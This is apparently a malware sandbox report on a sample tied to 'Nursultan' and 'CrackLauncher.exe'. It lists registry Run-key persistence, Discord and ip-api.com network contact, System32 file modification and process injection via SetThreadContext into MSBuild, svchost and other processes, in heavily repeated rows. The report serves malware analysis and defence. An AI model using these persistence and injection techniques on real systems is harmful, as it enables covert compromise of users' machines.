Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Запустить Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Запустить Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A
Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Nursultan Setup = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Nursultan Setup.exe" N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A C:\Windows\system32\powercfg.exe N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\MRT.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive N/A N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\MRT.exe N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2224 set thread context of 2540 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4584 set thread context of 3356 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4972 set thread context of 4420 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 512 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 628 set thread context of 2056 N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe C:\Windows\system32\conhost.exe
PID 628 set thread context of 3168 N/A C:\ProgramData\scppqqgespxv\jqvljmboayxs.exe C:\Windows\system32\svchost.exe
PID 4284 set thread context of 5048 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 4392 set thread context of 5068 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4808 set thread context of 2652 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 916 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2320 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5016 set thread context of 4468 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 2336 set thread context of 652 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4992 set thread context of 4780 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2652 set thread context of 2188 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 2756 set thread context of 392 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 1932 set thread context of 1884 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3660 set thread context of 3384 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4412 set thread context of 4028 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 628 set thread context of 4120 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\SYSTEM32\cmd.exe
PID 1892 set thread context of 3192 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
PID 4484 set thread context of 3700 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 3544 set thread context of 4304 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4788 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 3112 set thread context of 4160 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3192 set thread context of 4988 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5012 set thread context of 4824 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Wbem\wmic.exe
PID 1552 set thread context of 1104 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2188 set thread context of 2468 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 64 set thread context of 4052 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4992 set thread context of 5036 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\system32\sc.exe
PID 5032 set thread context of 4648 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 4284 set thread context of 3708 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
PID 3400 set thread context of 1708 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 1332 set thread context of 4376 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 5476 set thread context of 5472 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 2880 set thread context of 5456 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
PID 5764 set thread context of 5224 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
PID 352 set thread context of 5584 N/A C:\Users\Admin\AppData\Local\Temp\Nursultan.exe C:\Windows\System32\Conhost.exe
